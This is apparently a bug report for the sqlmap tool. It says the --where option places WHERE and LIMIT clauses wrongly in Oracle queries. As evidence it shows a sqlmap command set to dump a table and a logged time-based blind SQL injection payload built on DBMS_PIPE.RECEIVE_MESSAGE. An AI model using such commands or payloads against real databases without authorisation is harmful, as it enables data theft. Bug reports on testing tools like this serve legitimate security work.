--where bug #4355
Description
Hi,
please check logs below, shouldn't it be "AS LIMIT FROM db.table WHERE column1=to_char(123) qq" rather than "AS WHERE column1=to_char(123) LIMIT FROM db.table qq"?
thanks.
python sqlmap.py -u "https://..." --data="t=1" --dbms "Oracle" -D "db" -T "table" -C "column1" --dump --random-agent --keep-alive --timeout=300 --time-sec=300 -o -v 4 --where column1="to_char(123)"
[22:35:41] [PAYLOAD] 1' AND 3784=(CASE WHEN (ASCII(SUBSTRC((SELECT NVL(CAST(column1 AS VARCHAR(4000)),CHR(32)) FROM (SELECT qq.*,ROWNUM AS WHERE column1=123 LIMIT FROM db.table qq) WHERE LIMIT=1),1,1))>1) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(98)||CHR(76)||CHR(121),300) ELSE 3784 END) AND 'mhTz'='mhTz